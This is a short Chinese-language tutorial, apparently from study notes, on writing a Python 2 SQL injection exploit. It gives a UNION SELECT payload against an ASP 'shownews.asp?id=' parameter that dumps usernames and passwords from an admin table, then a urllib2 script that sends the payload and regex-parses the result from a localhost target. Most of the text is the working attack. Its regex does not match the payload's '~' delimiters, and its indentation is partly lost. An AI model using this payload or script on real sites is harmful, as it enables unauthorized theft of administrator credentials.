exp编写

1. 1. • • • exp编写篇
            简单注入exp编写 python

python版本
python2.7 停止更新
python3 学的话就要学习python3

python编写exp
注入的exp payload
shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin
coding:utf-8 设置编码
import 导入模块 导入urllib2 re

首先 设置 pydev工具 新建一个python项目 新建exp01.py文件

代码

coding:utf-8

import urllib2
import re

def get_page(url):
#获取网页源码
payload='/shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin'
req = urllib2.Request(url+payload)
response = urllib2.urlopen(req)
page = response.read()
return page

def exploit(url):
#利用函数
html = get_page(url)
try:
m =re.search('_(.*?)',html)

    return m.group(1)

except:
    return ''

url = 'http://127.0.0.1:99'
print exploit(url)